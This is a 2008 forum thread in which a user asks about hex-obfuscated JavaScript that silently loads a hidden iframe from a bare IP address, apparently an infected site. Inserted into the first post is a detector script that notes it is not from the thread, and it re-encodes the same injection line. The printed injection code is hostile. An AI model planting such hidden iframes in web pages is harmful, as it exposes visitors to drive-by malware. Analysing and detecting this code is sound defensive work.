# Possible malicious script found in page source - help please



## Demonixx (Jul 3, 2008)

Hello, this is my first post here so I hope I have the right place!

I visited a website earlier and found that my antivirus software blocked a site from running. I use NOD32; no other software has picked this up.

I checked out the URL and IP and found that when I tried to visit those locations I was blocked again, and furthermore they are labeled as a possible malicious site by Google.

I couldn't work this out at first, but when looking through the source code I found a script disguised via hex to make the user visit the blocked site through an iFrame. So when you visited the site you also unknowingly visited another through an invisible iFrame.

Here is what was disguised via hex:


```javascript
window.status='Done';document.write('<iframe name=d92ee530 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*67600)+'8fd22\' width=400 height=169 style=\'display: none\'></iframe>')
```
So the URL is http://58.65.232.33/gpack + random number + 8fd22

The site isn't a huge site but is well known amongst some communities. The fact that it uses hidden iFrames to make the user unknowingly visit possibly malicious sites, all whilst being disguised in the source code, makes me very suspicious.

Could anybody help me out and tell me what this script is doing? Could it be boosting visit numbers, stealing cookies, tracking users? 

Any help would be great, thanks.
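As an added example (not code from this thread, and not anything taken from the site in question), here is a small scanner for the pattern described above: it pulls each `<script>` body out of a page's HTML source, undoes hex-style string obfuscation (`\xHH`, `\uHHHH` and `%HH` escapes), and then flags any iframe in the decoded text that is hidden via `display: none`, `visibility: hidden` or a 0/1 pixel size, or whose `src` points at a bare IP address instead of a hostname. The function names and the sample page are constructed for illustration; the sample page hex-escapes the exact line posted above so the detector has something realistic to decode.

```javascript
// Added example, not code from the thread: a detector for hex-obfuscated
// scripts that inject hidden iframes. All names and sample data are constructed.

// Decode the escape forms commonly used to hide script text in page source.
// Note: the %HH pass will also decode legitimately URL-encoded text, which is
// acceptable for a detector that only wants to see what the browser would run.
function decodeEscapes(text) {
  const fromHex = (_, h) => String.fromCharCode(parseInt(h, 16));
  return text
    .replace(/\\x([0-9a-fA-F]{2})/g, fromHex)
    .replace(/\\u([0-9a-fA-F]{4})/g, fromHex)
    .replace(/%([0-9a-fA-F]{2})/g, fromHex);
}

// Return the body of every <script>...</script> element in the HTML.
function extractScripts(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Inspect one decoded script body and report suspicious iframes.
function analyseScript(decoded) {
  const findings = [];
  const viaDocumentWrite = /document\.write\s*\(/i.test(decoded);
  const iframeRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = iframeRe.exec(decoded)) !== null) {
    const attrs = m[1];
    // Inside a document.write('...') string the src is wrapped in escaped
    // quotes (\'...\'), so allow an optional backslash before the quote.
    const srcMatch = attrs.match(/\bsrc\s*=\s*\\?['"]?([^'"\\\s>]+)/i);
    const src = srcMatch ? srcMatch[1] : "";
    const hidden =
      /display\s*:\s*none/i.test(attrs) ||
      /visibility\s*:\s*hidden/i.test(attrs) ||
      /\b(width|height)\s*=\s*\\?['"]?[01]\b/i.test(attrs);
    // A raw IPv4 literal as the host is a strong indicator on its own.
    const bareIp = /^https?:\/\/\d{1,3}(\.\d{1,3}){3}(?=[:/]|$)/i.test(src);
    if (hidden || bareIp) findings.push({ src, hidden, bareIp, viaDocumentWrite });
  }
  return findings;
}

// Scan a whole page: decode each script, then analyse it. The "obfuscated"
// flag records whether decoding changed the script text at all.
function scanPage(html) {
  const findings = [];
  for (const raw of extractScripts(html)) {
    const decoded = decodeEscapes(raw);
    const obfuscated = decoded !== raw;
    for (const f of analyseScript(decoded)) findings.push({ ...f, obfuscated });
  }
  return findings;
}

// --- Constructed sample page -----------------------------------------------
// The injected line from the post, as it reads once decoded. To build a page
// resembling what the poster saw, it is hex-escaped into an eval("...") call.
const INJECTED = "window.status='Done';document.write('<iframe name=d92ee530 src=\\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*67600)+'8fd22\\' width=400 height=169 style=\\'display: none\\'></iframe>')";

// Encode every character as \xHH (constructed helper, used only to build the sample).
function hexEscape(s) {
  return Array.from(s, (c) => "\\x" + c.charCodeAt(0).toString(16).padStart(2, "0")).join("");
}

const SAMPLE_HTML = `<html><head><meta name="description" content="welcome"></head>
<body><a href="main.html"><img src="welcome.jpg"></a>
<script>var counter = 1;</script>
<script>eval("${hexEscape(INJECTED)}")</script>
</body></html>`;

console.log(JSON.stringify(scanPage(SAMPLE_HTML), null, 2));
```

Run with `node` and the benign `<script>` produces nothing, while the escaped one is reported with `src` set to the `/gpack/index.php?` URL, `hidden`, `bareIp`, `obfuscated` and `viaDocumentWrite` all true. The same checks apply to saved page source from any site: the random number appended to the URL does not matter to the detector, because only the static prefix of `src` is examined.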


----------



## Demonixx (Jul 3, 2008)

Edit: the final URL is: http://58.65.232.33/gpack/index.php? + random number + 8fd22

(sorry, couldn't edit original post)


----------



## jamiemac2005 (Jul 5, 2007)

It looks to me like an advertising banner (the Math.random() in the URL feeds a random number to the end of the URL)... It could be a number of things...
What's suspicious about this is whether it's running or not, because technically document.write(); would completely redirect the page being viewed.

Anyway, what's the URL of the site this source code is on?
(It would help if I could visualise it)

Cheers,
Jamey


----------



## Demonixx (Jul 3, 2008)

Thanks for the reply Jamey.

The site has a welcome page consisting of nothing but a static JPEG image and an HTML link to the main site; there are no adverts, just an image and a link. That is it: no redirecting, no clicks, no loading, no nothing.

Friends of mine and I have been using the site, but it was not until I purchased NOD32 that any warning appeared, which was reaffirmed by the Google & Firefox warnings and NOD32 again.

From the source code nothing looks untoward, as it just includes metadata and benign HTML; the code that relates to the hidden iFrame which makes the user visit the malicious site is the only thing 'hidden' via hex.

I'm just curious as to what this unwitting and unknown visit to a site could do. Do you have any ideas? I know you can use iFrames for CSX amongst other things, but why would an owner and super user of a site include this in his site? That's what is guiding me towards boosted numbers etc.


----------



## jamiemac2005 (Jul 5, 2007)

Hey, I "whois"ed the IP address and found something curious; the site is hosted by/associated with "hostfresh.com": 58.65.232.0 - 58.65.239.255

Who hosts the site you're talking about?...

Anyway, as for consequences of being redirected by this, it seems as if Google and/or most anti-spyware programs which modify hosts files have blacklisted the site, so the users are only likely to get a "this page is dangerous" page in the hidden iframe...

So I don't think there's a problem there. To be honest, I've tried whatever I can to look at the site and it was near-impossible... It redirects to a PHP-based page, so boosted numbers etc. does make sense; the random number generation is also something to be curious about, but I don't know exactly what it could be doing.

Cheers,
Jamey


----------



## af3 (Jun 18, 2008)

It must be annoying having NOD32 block sites with ads...


----------



## Demonixx (Jul 3, 2008)

Thanks for your efforts Jamey,

I've looked it up as far as I can too and haven't come to any conclusion other than it being suspicious. I think you're right about the site not reaching the user through the iframe. Still, it's very odd (to a person who doesn't know much).

Anybody have any ideas?

Edit: af3, I've been using NOD32 whilst browsing many sites with ads, and this is the only site (which doesn't make any effort to display ads) which has come up. Plus the site itself isn't blocked; it's the hidden iframe leading to another site that is blocked.

EDIT 2: I looked the IP up on Google and found that quite a few people have had this problem, so it has nothing to do with the administrator; his site is just infected, is all. Thanks for your help.


----------

